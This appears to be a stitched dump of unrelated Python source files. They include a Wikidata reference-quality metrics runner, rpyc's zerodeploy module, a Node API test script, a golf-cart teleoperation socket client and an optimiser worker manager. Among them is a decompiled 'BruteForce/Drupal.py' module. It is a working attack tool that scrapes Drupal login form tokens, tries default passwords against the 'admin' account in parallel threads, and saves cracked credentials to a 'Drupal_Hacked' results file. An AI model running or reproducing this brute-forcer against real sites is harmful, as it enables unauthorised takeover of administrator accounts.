print('Running metric ...')
start_time = datetime.datetime.now()
freshness_checker = ReferenceFreshnessInItemChecker(
item_refed_facts, opts.upper_date)
dist = freshness_checker.check_referenced_facts_freshness()
end_time = datetime.datetime.now()
# saving the results for presentation layer
if len(dist) > 0:
write_results_to_CSV(freshness_checker.results, output_file_dist)
write_results_to_CSV(str(freshness_checker), output_file_result)
print('Metric: Freshness of fact referencing results have been written in the files: {0} and {1}'.format(
output_file_dist, output_file_result))
print('DONE. Metric: Freshness of fact referencing, Duration: {0}'.format(
end_time - start_time))
return 0
def compute_external_uris_freshness(opts: ArgumentParser) -> int:
print('Started computing Metric: Freshness of external sources')
input_data_file = os.path.join(
opts.data_dir + os.sep + 'external_uris.data')
output_file_dist = os.path.join(
opts.output_dir + os.sep + 'external_uris_freshness.csv')
output_file_result = os.path.join(
opts.output_dir + os.sep + 'external_uris_freshness_ratio.csv')
# reading the extracted External URIs
print('Reading data ...')
uris = []
try:
with open(input_data_file, encoding="utf8") as file:
for line in file:
uris.append(line.rstrip())
except FileNotFoundError:
print("Error: Input data file not found. Provide data file with name: {0} in data_dir".format(
'"external_uris.data"'))
exit(1)
# running the framework metric function
print('Running metric ...')
start_time = datetime.datetime.now()
freshness_checker = ExternalURIsFreshnessChecker(
uris, extract_google_cache=opts.extract_google_cache)
results = freshness_checker.check_external_uris_freshness()
end_time = datetime.datetime.now()
# saving the results for presentation layer
if len(results) > 0:
write_results_to_CSV(freshness_checker.results, output_file_dist)
write_results_to_CSV(str(freshness_checker), output_file_result)
print('Metric: Freshness of external sources results have been written in the file: {0} and {1}'.format(
output_file_dist, output_file_result))
print('DONE. Metric: Freshness of external sources, Duration: {0}'.format(
end_time - start_time))
return 0
def compute_external_uris_volatility(opts: ArgumentParser) -> int:
print('Started computing Metric: Volatility of external sources')
input_data_file = os.path.join(
opts.data_dir + os.sep + 'external_uris.data')
output_file_dist = os.path.join(
opts.output_dir + os.sep + 'external_uris_volatility.csv')
output_file_result = os.path.join(
opts.output_dir + os.sep + 'external_uris_volatility_ratio.csv')
# reading the extracted External URIs
print('Reading data ...')
uris = []
try:
with open(input_data_file, encoding="utf8") as file:
for line in file:
uris.append(line.rstrip())
except FileNotFoundError:
print("Error: Input data file not found. Provide data file with name: {0} in data_dir".format(
'"external_uris.data"'))
exit(1)
# running the framework metric function
print('Running metric ...')
start_time = datetime.datetime.now()
volatility_checker = ExternalURIsVolatilityChecker(uris)
results = volatility_checker.check_external_uris_volatility()
end_time = datetime.datetime.now()
# saving the results for presentation layer
if len(results) > 0:
write_results_to_CSV(volatility_checker.results, output_file_dist)
write_results_to_CSV(str(volatility_checker), output_file_result)
print('Metric: Volatility of external sources results have been written in the file: {0} and {1}'.format(
output_file_dist, output_file_result))
print('DONE. Metric: Volatility of external sources, Duration: {0}'.format(
end_time - start_time))
return 0
def compute_external_uris_timeliness(opts: ArgumentParser) -> int:
print('Started computing Metric: Timeliness of external sources')
input_data_file_freshness = os.path.join(
opts.output_dir + os.sep + 'external_uris_freshness.csv')
input_data_file_volatility = os.path.join(
opts.output_dir + os.sep + 'external_uris_volatility.csv')
output_file_dist = os.path.join(
opts.output_dir + os.sep + 'external_uris_timeliness.csv')
output_file_result = os.path.join(
opts.output_dir + os.sep + 'external_uris_timeliness_ratio.csv')
# reading the freshness input data
print('Reading data ...')
freshnesses = []
volatilities = []
try:
with open(input_data_file_freshness, encoding="utf8") as file:
reader = csv.reader(file)
next(reader, None) # skip the headers
for row in reader:
freshnesses.append(FreshnessOfURI(URIRef(str(row[0])), freshness_last_modif=float(
row[1]) if row[1] != '<None>' else None))
except FileNotFoundError:
print("Error: Input data file of freshness scores not found. Provide data file with name: {0} in --output-dir".format(
'"external_uris_freshness.csv"'))
exit(1)
# reading the volatility input data
try:
with open(input_data_file_volatility, encoding="utf8") as file:
reader = csv.reader(file)
next(reader, None) # skip the headers
for row in reader:
volatilities.append(VolatilityOfURI(
URIRef(str(row[0])), float(row[1]) if row[1] != '<None>' else None))
except FileNotFoundError:
print("Error: Input data file of volatility scores not found. Provide data file with name: {0} in --output-dir".format(
'"external_uris_volatility.csv"'))
exit(1)
# running the framework metric function
print('Running metric ...')
start_time = datetime.datetime.now()
timeliness_checker = ExternalURIsTimelinessChecker(
freshnesses, volatilities)
results = timeliness_checker.check_external_uris_timeliness()
end_time = datetime.datetime.now()
# saving the results for presentation layer
if len(results) > 0:
write_results_to_CSV(timeliness_checker.results, output_file_dist)
write_results_to_CSV(str(timeliness_checker), output_file_result)
print('Metric: Timeliness of external sources results have been written in the file: {0} and {1}'.format(
output_file_dist, output_file_result))
print('DONE. Metric: Timeliness of external sources, Duration: {0}'.format(
end_time - start_time))
return 0
def compute_class_property_schema_completeness(opts: ArgumentParser) -> int:
print('Started computing Metric: Schema completeness of references')
input_data_file = os.path.join(
opts.data_dir + os.sep + 'classes_facts_refs.data')
input_eid_summarization_related_classes = os.path.join(
opts.data_dir + os.sep + 'eschemas_summarization_related_classes.data')
input_eid_summarization_refed_fact_refs = os.path.join(
opts.data_dir + os.sep + 'eschemas_summarization_related_refed_fact_refs.data')
output_file_dist = os.path.join(
opts.output_dir + os.sep + 'class_property_schema_completeness.csv')
output_file_result = os.path.join(
opts.output_dir + os.sep + 'class_property_schema_completeness_ratio.csv')
# reading eid data
print('Reading Entity Schemas data ...')
try:
with open(input_eid_summarization_related_classes, encoding="utf8") as file:
related_class_csv = pd.read_csv(file)
except FileNotFoundError:
print("Error: Input data file not found. Provide data file with name: {0} in data_dir".format(
'"eschemas_summarization_related_classes.data"'))
exit(1)
try:
with open(input_eid_summarization_refed_fact_refs, encoding="utf8") as file:
refed_fact_refs_csv = pd.read_csv(file)
except FileNotFoundError:
print("Error: Input data file not found. Provide data file with name: {0} in data_dir".format(
'"eschemas_summarization_related_refed_fact_refs.data"'))
exit(1)
eid_summaries: List[EidRefSummary] = []
for eid in related_class_csv['eid'].unique().tolist():
refed_facts_refs: List[RefedFactRef] = []
for fact in refed_fact_refs_csv.loc[(refed_fact_refs_csv['eid'] == eid), 'refed fact'].unique().tolist():
refed_facts_refs.append(RefedFactRef(fact, refed_fact_refs_csv.loc[(refed_fact_refs_csv['eid'] == eid) & (
refed_fact_refs_csv['refed fact'] == fact), 'ref predicate'].dropna().tolist()))
eid_summaries.append(EidRefSummary(eid, related_class_csv.loc[related_class_csv['eid'] == eid, 'related class'].dropna(
).tolist(), related_class_csv.loc[related_class_csv['eid'] == eid, 'related property'].dropna().tolist(), refed_facts_refs))
print('Number of E-ids: ', len(eid_summaries))
print('Number of E-ids with referenced facts: ',
sum([1 for i in eid_summaries if len(i.refed_facts_refs) > 0]))
# reading the input instance-level data
print('Reading instance-level data ...')
refed_fact_refs: Dict = {}
try:
with open(input_data_file, encoding="utf8") as file:
reader = csv.reader(file)
for row in reader:
if row[0] not in refed_fact_refs.keys():
refed_fact_refs[str(row[0])] = []
refed_fact_refs[str(row[0])].append(row[1])
except FileNotFoundError:
print("Error: Input data file not found. Provide input data file with name: {0} in data_dir".format(
'"classes_facts_refs.data"'))
exit(1)
# running the framework metric function
print('Running metric ...')
start_time = datetime.datetime.now()
schema_comp_checker = ClassesPropertiesSchemaCompletenessChecker(
refed_fact_refs)
results = schema_comp_checker.check_ref_schema_existance_for_properties_Wikidata(
eid_summaries)
end_time = datetime.datetime.now()
# saving the results for presentation layer
if len(results) > 0:
write_results_to_CSV(schema_comp_checker.results, output_file_dist)
write_results_to_CSV(str(schema_comp_checker), output_file_result)
print('Metric: Schema completeness of references results have been written in the file: {0} and {1}'.format(
output_file_dist, output_file_result))
print('DONE. Metric: Schema completeness of references, Duration: {0}'.format(
end_time - start_time))
return 0
def RQSS_Framework_Runner(argv: Optional[Union[str, List[str]]] = None, prog: Optional[str] = None) -> int:
if isinstance(argv, str):
argv = argv.split()
opts = genargs(prog).parse_args(argv if argv is not None else sys.argv[1:])
# checking existance of the input data directory
opts.data_dir = Path(opts.data_dir)
if not opts.data_dir.is_dir():
print('The data directory "{0}" not existed.'.format(opts.data_dir))
return 1
opts.data_dir = str(opts.data_dir.resolve(strict=True))
# creating the output destination directory
print('Creating output directory: {0}'.format(opts.output_dir))
Path(opts.output_dir).mkdir(parents=True, exist_ok=True)
# list of parallel processes
framework_procs = []
if opts.dereferencing:
p = Process(target=compute_dereferencing(opts))
framework_procs.append(p)
if opts.licensing:
p = Process(target=compute_licensing(opts))
framework_procs.append(p)
if opts.security:
p = Process(target=compute_security(opts))
framework_procs.append(p)
if opts.ref_triple_syntax:
p = Process(target=compute_ref_triple_syntax(opts))
framework_procs.append(p)
if opts.ref_literal_syntax:
p = Process(target=compute_ref_literal_syntax(opts))
framework_procs.append(p)
if opts.ref_triple_semantic:
p = Process(target=compute_ref_triple_semantic(opts))
framework_procs.append(p)
if opts.ref_property_consistency:
p = Process(target=compute_ref_properties_consistency(opts))
framework_procs.append(p)
if opts.range_consistency:
p = Process(target=compute_range_consistency(opts))
framework_procs.append(p)
if opts.ref_sharing:
p = Process(target=compute_ref_sharing_ratio(opts))
framework_procs.append(p)
if opts.reputation:
p = Process(target=compute_dnsbl_reputation(opts))
framework_procs.append(p)
if opts.multiple_ref:
p = Process(target=compute_multiple_referenced(opts))
framework_procs.append(p)
if opts.human_added:
p = Process(target=compute_human_added_references_per_item(opts))
framework_procs.append(p)
if opts.ref_freshness:
p = Process(
target=compute_referenced_facts_reference_freshness_per_item(opts))
framework_procs.append(p)
if opts.ext_uris_freshness:
p = Process(target=compute_external_uris_freshness(opts))
framework_procs.append(p)
if opts.ext_uris_volatility:
p = Process(target=compute_external_uris_volatility(opts))
framework_procs.append(p)
if opts.ext_uris_timeliness:
p = Process(target=compute_external_uris_timeliness(opts))
framework_procs.append(p)
if opts.class_property_schema_completeness:
p = Process(target=compute_class_property_schema_completeness(opts))
framework_procs.append(p)
for proc in framework_procs:
proc.start()
for proc in framework_procs:
proc.join()
if __name__ == '__main__':
RQSS_Framework_Runner(sys.argv[1:])
|
zerodeploy.py | """
.. versionadded:: 3.3
Requires [plumbum](http://plumbum.readthedocs.org/)
"""
from __future__ import with_statement
import sys
import rpyc
import socket
from rpyc.lib.compat import BYTES_LITERAL
from rpyc.core.service import VoidService
from rpyc.core.stream import SocketStream
try:
from plumbum import local, ProcessExecutionError, CommandNotFound
from plumbum.path import copy
except ImportError:
import inspect
if any("sphinx" in line[1] or "docutils" in line[1] or "autodoc" in line[1] for line in inspect.stack()):
# let the sphinx docs be built without requiring plumbum installed
pass
else:
raise
SERVER_SCRIPT = r"""\
import sys
import os
import atexit
import shutil
from threading import Thread
here = os.path.dirname(__file__)
os.chdir(here)
def rmdir():
shutil.rmtree(here, ignore_errors = True)
atexit.register(rmdir)
try:
for dirpath, _, filenames in os.walk(here):
for fn in filenames:
if fn == "__pycache__" or (fn.endswith(".pyc") and os.path.exists(fn[:-1])):
os.remove(os.path.join(dirpath, fn))
except Exception:
pass
sys.path.insert(0, here)
from $MODULE$ import $SERVER$ as ServerCls
from rpyc import SlaveService
logger = None
$EXTRA_SETUP$
t = ServerCls(SlaveService, hostname = "localhost", port = 0, reuse_addr = True, logger = logger)
thd = Thread(target = t.start)
thd.setDaemon(True)
thd.start()
sys.stdout.write("%s\n" % (t.port,))
sys.stdout.flush()
try:
sys.stdin.read()
finally:
t.close()
thd.join(2)
"""
class DeployedServer(object):
"""
Sets up a temporary, short-lived RPyC deployment on the given remote machine. It will:
1. Create a temporary directory on the remote machine and copy RPyC's code
from the local machine to the remote temporary directory.
2. Start an RPyC server on the remote machine, binding to an arbitrary TCP port,
allowing only in-bound connections (``localhost`` connections). The server reports the
chosen port over ``stdout``.
3. An SSH tunnel is created from an arbitrary local port (on the local host), to the remote
machine's chosen port. This tunnel is authenticated and encrypted.
4. You get a ``DeployedServer`` object that can be used to connect to the newly-spawned server.
5. When the deployment is closed, the SSH tunnel is torn down, the remote server terminates
and the temporary directory is deleted.
:param remote_machine: a plumbum ``SshMachine`` or ``ParamikoMachine`` instance, representing
an SSH connection to the desired remote machine
:param server_class: the server to create (e.g., ``"ThreadedServer"``, ``"ForkingServer"``)
:param extra_setup: any extra code to add to the script
"""
def __init__(self, remote_machine, server_class = "rpyc.utils.server.ThreadedServer", extra_setup = "", python_executable=None):
self.proc = None
self.tun = None
self.remote_machine = remote_machine
self._tmpdir_ctx = None
rpyc_root = local.path(rpyc.__file__).up()
self._tmpdir_ctx = remote_machine.tempdir()
tmp = self._tmpdir_ctx.__enter__()
copy(rpyc_root, tmp / "rpyc")
script = (tmp / "deployed-rpyc.py")
modname, clsname = server_class.rsplit(".", 1)
script.write(SERVER_SCRIPT.replace("$MODULE$", modname).replace("$SERVER$", clsname).replace("$EXTRA_SETUP$", extra_setup))
if python_executable:
cmd = remote_machine[python_executable]
else:
major = sys.version_info[0]
minor = sys.version_info[1]
cmd = None
for opt in ["python%s.%s" % (major, minor), "python%s" % (major,)]:
try:
cmd = remote_machine[opt]
except CommandNotFound:
pass
else:
break
if not cmd:
cmd = remote_machine.python
self.proc = cmd.popen(script, new_session = True)
line = ""
try:
line = self.proc.stdout.readline()
self.remote_port = int(line.strip())
except Exception:
try:
self.proc.terminate()
except Exception:
pass
stdout, stderr = self.proc.communicate()
raise ProcessExecutionError(self.proc.argv, self.proc.returncode, BYTES_LITERAL(line) + stdout, stderr)
if hasattr(remote_machine, "connect_sock"):
# Paramiko: use connect_sock() instead of tunnels
self.local_port = None
else:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(("localhost", 0))
self.local_port = s.getsockname()[1]
s.close()
self.tun = remote_machine.tunnel(self.local_port, self.remote_port)
def __del__(self):
self.close()
def __enter__(self):
return self
def __exit__(self, t, v, tb):
self.close()
def close(self):
if self.proc is not None:
try:
self.proc.terminate()
except Exception:
pass
self.proc = None
if self.tun is not None:
try:
self.tun.close()
except Exception:
pass
self.tun = None
if self._tmpdir_ctx is not None:
try:
self._tmpdir_ctx.__exit__(None, None, None)
except Exception:
pass
self._tmpdir_ctx = None
def connect(self, service = VoidService, config = {}):
"""Same as :func:`connect <rpyc.utils.factory.connect>`, but with the ``host`` and ``port``
parameters fixed"""
if self.local_port is None:
# ParamikoMachine
stream = SocketStream(self.remote_machine.connect_sock(self.remote_port))
return rpyc.connect_stream(stream, service = service, config = config)
else:
return rpyc.connect("localhost", self.local_port, service = service, config = config)
def classic_connect(self):
"""Same as :func:`classic.connect <rpyc.utils.classic.connect>`, but with the ``host`` and
``port`` parameters fixed"""
if self.local_port is None:
# ParamikoMachine
stream = SocketStream(self.remote_machine.connect_sock(self.remote_port))
return rpyc.classic.connect_stream(stream)
else:
return rpyc.classic.connect("localhost", self.local_port)
class MultiServerDeployment(object):
"""
An 'aggregate' server deployment to multiple SSH machine. It deploys RPyC to each machine
separately, but lets you manage them as a single deployment.
"""
def __init__(self, remote_machines, server_class = "ThreadedServer"):
self.remote_machines = remote_machines
# build the list incrementally, so we can clean it up if we have an exception
self.servers = [DeployedServer(mach, server_class) for mach in remote_machines]
def __del__(self):
self.close()
def __enter__(self):
return self
def __exit__(self, t, v, tb):
self.close()
def __iter__(self):
return iter(self.servers)
def __len__(self):
return len(self.servers)
def __getitem__(self, index):
return self.servers[index]
def close(self):
while self.servers:
s = self.servers.pop(0)
s.close()
def connect_all(self, service = VoidService, config = {}):
"""connects to all deployed servers; returns a list of connections (order guaranteed)"""
return [s.connect(service, config) for s in self.servers]
def classic_connect_all(self):
"""connects to all deployed servers using classic_connect; returns a list of connections (order guaranteed)"""
return [s.classic_connect() for s in self.servers]
|
Drupal.py | # uncompyle6 version 2.11.5
# Python bytecode 2.7 (62211)
# Decompiled from: Python 2.7.18 (default, Apr 20 2020, 20:30:41)
# [GCC 9.3.0]
# Embedded file name: BruteForce\Drupal.py
import requests
import re
import threading
import time
from Exploits import printModule
r = '\x1b[31m'
g = '\x1b[32m'
y = '\x1b[33m'
b = '\x1b[34m'
m = '\x1b[35m'
c = '\x1b[36m'
w = '\x1b[37m'
Headers = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0'}
passwords = open('files/DefaultPasswords_Drupal.txt', 'r').read().splitlines()
class DrupalBruteForce(object):
def __init__(self):
self.flag = 0
self.password = passwords
def Run(self, site):
thread = []
for passwd in self.password:
t = threading.Thread(target=self.Drupal, args=(site, passwd))
if self.flag == 1:
break
else:
t.start()
thread.append(t)
time.sleep(0.08)
for j in thread:
j.join()
if self.flag == 0:
return printModule.returnNo(site, 'N/A', 'Drupal Bruteforce', 'Drupal')
else:
return printModule.returnYes(site, 'N/A', 'Drupal Bruteforce', 'Drupal')
def Drupal(self, site, passwd):
try:
agent = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0'}
sess = requests.session()
GetToken = sess.get('http://' + site + '/user/login', timeout=5, headers=agent)
GetTokeBuld = re.findall('name="form_build_id" value="(.*)"', str(GetToken.content))[0]
GetNameform = re.findall('name="form_id" value="(.*)"', str(GetToken.content))[0]
PostData = {'name': 'admin',
'pass': passwd,
'form_build_id': GetTokeBuld,
'form_id': GetNameform,
'op': 'Log+in'
}
url = 'http://' + site + '/user/login'
GoT = sess.post(url, data=PostData, headers=agent, timeout=10)
if 'Log out' in str(GoT.content) and 'edit' in str(GoT.content):
with open('result/Drupal_Hacked.txt', 'a') as writer:
writer.write('http://' + site + '/user/login' + '\n Username: admin' + '\n Password: ' + passwd + '\n-----------------------------------------\n')
self.flag = 1
except:
pass |
api_tests.py | import os
import subprocess as sp
from urllib.parse import urljoin
import requests
from multiprocessing import Process
from time import sleep
from datetime import timedelta,datetime
import random
import argparse
# Parser configs
parser = argparse.ArgumentParser(description='used for testing cpga-book-server api')
parser.add_argument('-p', help='port to run server on(default:3000)')
parser.add_argument('-v', help='to show server logs or not', action="store_true")
args = parser.parse_args()
PORT=int(args.p) if(args.p) else 3000
url= os.environ.get("URL") if(os.environ.get("URL")!=None) else f'http://localhost:{PORT}/'
#url='http://api-rhapsody.herokuapp.com/'
class bcolors:
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKCYAN = '\033[96m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
def print_color(color,out):
initstr=f'{color}{bcolors.BOLD}'
if(color==bcolors.OKGREEN):
symbol="[+] "
elif(color==bcolors.FAIL):
symbol="[-] "
elif(color==bcolors.HEADER):
symbol="[*] "
elif(color==bcolors.WARNING):
symbol="[!] "
final=initstr+symbol+f'{out}{bcolors.ENDC}'
print(final)
def start_node_server(process):
while True:
output=process.stdout.readline()
if(output=='' and process.poll() is not None):
break
if output:
output=output.decode().strip()
if('MongooseServerSelectionError: connect ECONNREFUSED 127.0.0.1:27017' in output):
print_color(bcolors.FAIL,'enable mongodb service')
break
if(args.v):
print(output)
def test_url_get_list(path,params):
success=True
testurl=urljoin(url,path)
sleeptime=0.5
print_color(bcolors.HEADER,f'testing url {testurl}')
print_color(bcolors.HEADER,f'testing without if-modified-since\n')
r=requests.get(testurl,params=params)
college_list=[]
sleep(sleeptime)
if(r.status_code==200):
print_color(bcolors.OKGREEN,f'Success {r.status_code}')
college_list=[i.strip().strip("\"''").strip() for i in r.text.strip('][').split(",")]
else:
print_color(bcolors.FAIL,f'Failed {r.status_code}')
success=False
print_seperator('-')
print_color(bcolors.HEADER,f'testing with future if-modified-since\n')
header={'If-modified-since':(datetime.now()+timedelta(hours=25)).isoformat()}
r=requests.get(testurl,headers=header,params=params)
sleep(sleeptime)
if(r.status_code==304):
print_color(bcolors.OKGREEN,f'Success {r.status_code}')
else:
print_color(bcolors.FAIL,f'Failed {r.status_code}')
success=False
print_seperator('-')
header={'If-modified-since':(datetime.fromtimestamp(0)).isoformat()}
print_color(bcolors.HEADER,f'testing with past if-modified-since\n')
r=requests.get(testurl,headers=header,params=params)
sleep(sleeptime)
if(r.status_code==200):
print_color(bcolors.OKGREEN,f'Success {r.status_code}')
else:
print_color(bcolors.FAIL,f'Failed {r.status_code}')
success=False
print_seperator('-')
return college_list,success
def print_seperator(sep):
if(sep=='*'):
print("\n"*2+sep*80 +"\n"*2)
elif(sep=='-'):
print("\n"+sep*40 +"\n")
try:
myenv=os.environ.copy()
myenv["PORT"]=str(PORT)
process=sp.Popen('npm start'.split(),env=myenv,stderr=sp.STDOUT,stdout=sp.PIPE)
node=Process(target=start_node_server,args=(process,))
node.start()
sleep(5)
keys=['college','course','branch','semester']
paths=[
'/academia/college-list',
'/academia/course-list',
'/academia/branch-list',
'/academia/semester-list'
]
params={}
for i in range(len(keys)):
out_list,res=test_url_get_list(paths[i],params)
params[keys[i]]=out_list[random.randint(0,len(out_list)-1)].split("(")[0].strip()
print_seperator('*')
except KeyboardInterrupt:
pass
finally:
process.terminate()
node.terminate()
|
connector.py | import socket
import logging
import sys
import threading
import time
import src.util as util
# Drive Computer Remote Telop Client
# Connector
#
# Part of the GSSM Autonomous Golf Cart
# Written by:
# Benjamin Chauhan, class of 2022
# Joseph Telaak, class of 2022
class Teleop_Connector:
def __init__(self, ip_addr, establish_port=42070, command_port=70, log_port=421, response_port=778):
# Create Ports
self.logging_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.response_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.command_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# Keystroke Logger (Useful for training and repeating actions)
self.keystroke_logger = logging.getLogger("keystroke")
self.keystroke_logger.setLevel(logging.DEBUG)
keystroke_file_handler = logging.FileHandler("recored_presses.log")
keystroke_file_handler.setFormatter("%(asctime)s - %(message)s")
self.keystroke_logger.addHandler(keystroke_file_handler)
# Cart Response Logger
self.response_logger = logging.getLogger("responses")
self.response_logger.setLevel(logging.DEBUG)
response_file_handler = logging.FileHandler("responses.log")
response_file_handler.setFormatter("%(asctime)s - %(message)s")
self.response_logger.addHandler(response_file_handler)
response_console_handler = logging.StreamHandler(sys.stdout)
response_console_handler.setFormatter("%(asctime)s - %(name)s - %(message)s")
self.response_logger.addHandler(response_console_handler)
# Cart Log
self.logger = logging.getLogger("log")
self.logger.setLevel(logging.DEBUG)
log_file_handler = logging.FileHandler("log.log")
log_file_handler.setFormatter("%(asctime)s - %(message)s")
self.logger.addHandler(log_file_handler)
log_console_handler = logging.StreamHandler(sys.stdout)
log_console_handler.setFormatter("%(asctime)s - %(name)s - %(message)s")
self.logger.addHandler(log_console_handler)
# Config
self.ip_addr = ip_addr
self.establish_port = establish_port
self.command_port = command_port
self.log_port = log_port
self.response_port = response_port
# Threads
self.log_listener_thread = threading.Thread(target=self.log_listener, name="log listener", daemon=True)
self.response_listener_thread = threading.Thread(target=self.response_lister, name="response listener", daemon=True)
# Kill
self.kill = False
# Sends a command to enable the server on the drice computer
# Returns boolean
def establish_connection(self, max_attempts = 5):
print(f"Attempting to Establish Connection with {self.ip_addr}")
connected = False
attempts = 0
while not connected:
# Create Connection
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((self.ip_addr, self.establish_port))
# Send request
s.send(("Bruh, lemme control you with dis joystick!").encode())
data = s.recv(1024)
# Check message
if data.decode() == "Okay no cap!":
print("Connection Successful")
return True
else:
# Increment Attempts Counter
attempts += 1
# Exit
if attempts == max_attempts:
print(util.to_color("Connection Failed, Exiting...", "red"))
sys.exit(1)
# Close the connector
def close(self):
print("Exiting. Killing all threads and closing sockets")
self.kill = True
# Create Connection
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((self.ip_addr, self.establish_port))
# Send request
s.send(("I think we need to talk").encode())
# Wait and close
time.sleep(2)
# Sends an action to the sever
def sendAction(self, action):
self.keystroke_logger.info(str(action))
self.command_socket.sendto(bytes(action, 'utf-8'), (self.ip_addr, self.command_port))
# Starts the listner threads
def startListeners(self):
self.log_listener_thread.start()
self.response_listener_thread.start()
# Listens for log info from the server
def log_listener(self):
# Accept Connections
self.logging_socket.bind(("", self.log_port))
self.logging_socket.listen()
while not self.kill:
# Get Connection
(clientConnected, clientAddress) = self.logging_socket.accept()
data = clientConnected.recv(1024).decode()
# Log
self.logger.info(data)
# Listens for repsonses from the server
def response_lister(self):
# Accept Connections
self.response_socket.bind(("", self.response_port))
self.response_socket.listen()
while not self.kill:
# Get Connection
(clientConnected, clientAddress) = self.response_socket.accept()
data = clientConnected.recv(1024).decode()
# Log
self.response_logger.info(data)
|
worker_manager.py | """
A manager for multiple workers.
-- kandasamy@cs.cmu.edu
"""
# pylint: disable=abstract-class-little-used
# pylint: disable=invalid-name
# pylint: disable=no-member
from __future__ import print_function
from argparse import Namespace
from multiprocessing import Process
import numpy as np
import os
import sys
if sys.version_info[0] < 3:
from sets import Set
else:
Set = set
import shutil
import time
# Local
from opt.function_caller import EVAL_ERROR_CODE
TIME_TOL = 1e-5
class WorkerManager(object):
""" A Base class for a worker manager. """
def __init__(self, worker_ids, poll_time):
""" Constructor. """
if hasattr(worker_ids, '__iter__'):
self.worker_ids = worker_ids
else:
self.worker_ids = list(range(worker_ids))
self.num_workers = len(self.worker_ids)
self.poll_time = poll_time
# These will be set in reset
self.optimiser = None
self.latest_results = None
# Reset
self.reset()
def reset(self):
""" Resets everything. """
self.optimiser = None
self.latest_results = [] # A list of namespaces
self._child_reset()
def _child_reset(self):
""" Child reset. """
raise NotImplementedError('Implement in a child class.')
def fetch_latest_results(self):
""" Returns the latest results. """
ret_idxs = []
for i in range(len(self.latest_results)):
if (self.latest_results[i].receive_time <=
self.optimiser.get_curr_spent_capital() + TIME_TOL):
ret_idxs.append(i)
keep_idxs = [i for i in range(len(self.latest_results)) if i not in ret_idxs]
ret = [self.latest_results[i] for i in ret_idxs]
self.latest_results = [self.latest_results[i] for i in keep_idxs]
return ret
def close_all_jobs(self):
""" Closes all jobs. """
raise NotImplementedError('Implement in a child class.')
def set_optimiser(self, optimiser):
""" Set the optimiser. """
self.optimiser = optimiser
def a_worker_is_free(self):
""" Returns true if a worker is free. """
raise NotImplementedError('Implement in a child class.')
def all_workers_are_free(self):
""" Returns true if all workers are free. """
raise NotImplementedError('Implement in a child class.')
def _dispatch_evaluation(self, func_caller, point, qinfo):
""" Dispatches job. """
raise NotImplementedError('Implement in a child class.')
def dispatch_single_evaluation(self, func_caller, point, qinfo):
""" Dispatches job. """
raise NotImplementedError('Implement in a child class.')
def dispatch_batch_of_evaluations(self, func_caller, points, qinfos):
""" Dispatches an entire batch of evaluations. """
raise NotImplementedError('Implement in a child class.')
def get_time_distro_info(self):
""" Returns information on the time distribution. """
#pylint: disable=no-self-use
return ''
# A synthetic worker manager - for simulating multiple workers ---------------------------
class SyntheticWorkerManager(WorkerManager):
""" A Worker manager for synthetic functions. Mostly to be used in simulations. """
def __init__(self, num_workers, time_distro='const', time_distro_params=None):
""" Constructor. """
self.worker_pipe = None
super(SyntheticWorkerManager, self).__init__(num_workers, poll_time=None)
# Set up the time sampler
self.time_distro = time_distro
self.time_distro_params = time_distro_params
self.time_sampler = None
self._set_up_time_sampler()
def _set_up_time_sampler(self):
""" Set up the sampler for the time random variable. """
self.time_distro_params = Namespace() if self.time_distro_params is None else \
self.time_distro_params
if self.time_distro == 'const':
if not hasattr(self.time_distro_params, 'const_val'):
self.time_distro_params.const_val = 1
self.time_sampler = lambda num_samples: (np.ones((num_samples,)) *
self.time_distro_params.const_val)
elif self.time_distro == 'uniform':
if not hasattr(self.time_distro_params, 'ub'):
self.time_distro_params.ub = 2.0
self.time_distro_params.lb = 0.0
ub = self.time_distro_params.ub
lb = self.time_distro_params.lb
self.time_sampler = lambda num_samples: (np.random.random((num_samples,)) *
(ub - lb) + lb)
elif self.time_distro == 'halfnormal':
if not hasattr(self.time_distro_params, 'ub'):
self.time_distro_params.sigma = np.sqrt(np.pi/2)
self.time_sampler = lambda num_samples: np.abs(np.random.normal(
scale=self.time_distro_params.sigma, size=(num_samples,)))
else:
raise NotImplementedError('Not implemented time_distro = %s yet.'%(
self.time_distro))
def _child_reset(self):
""" Child reset. """
self.worker_pipe = [[wid, 0.0] for wid in self.worker_ids]
def sort_worker_pipe(self):
""" Sorts worker pipe by finish time. """
self.worker_pipe.sort(key=lambda x: x[-1])
def a_worker_is_free(self):
""" Returns true if a worker is free. """
return self.worker_pipe[0][-1] # Always return true as this is synthetic.
def all_workers_are_free(self):
""" Returns true if all workers are free. """
return self.worker_pipe[-1][-1]
def close_all_jobs(self):
""" Close all jobs. """
pass
def _dispatch_evaluation(self, func_caller, point, qinfo, worker_id, **kwargs):
""" Dispatch evaluation. """
qinfo.worker_id = worker_id # indicate which worker
val, qinfo = func_caller.eval_single(point, qinfo, **kwargs)
qinfo.eval_time = float(self.time_sampler(1))
qinfo.val = val
qinfo.receive_time = qinfo.send_time + qinfo.eval_time
# Store the result in latest_results
self.latest_results.append(qinfo)
return qinfo
def dispatch_single_evaluation(self, func_caller, point, qinfo, **kwargs):
""" Dispatch a single evaluation. """
worker_id = self.worker_pipe[0][0]
qinfo = self._dispatch_evaluation(func_caller, point, qinfo, worker_id, **kwargs)
# Sort the pipe
self.worker_pipe[0][-1] = qinfo.receive_time
self.sort_worker_pipe()
def dispatch_batch_of_evaluations(self, func_caller, points, qinfos, **kwargs):
""" Dispatches an entire batch of evaluations. """
assert len(points) == self.num_workers
for idx in range(self.num_workers):
qinfo = self._dispatch_evaluation(func_caller, points[idx], qinfos[idx],
self.worker_pipe[idx][0], **kwargs)
self.worker_pipe[idx][-1] = qinfo.receive_time
self.sort_worker_pipe()
def get_time_distro_info(self):
""" Returns information on the time distribution. """
return self.time_distro
# Real worker manager - for simulating multiple workers --------------------------------
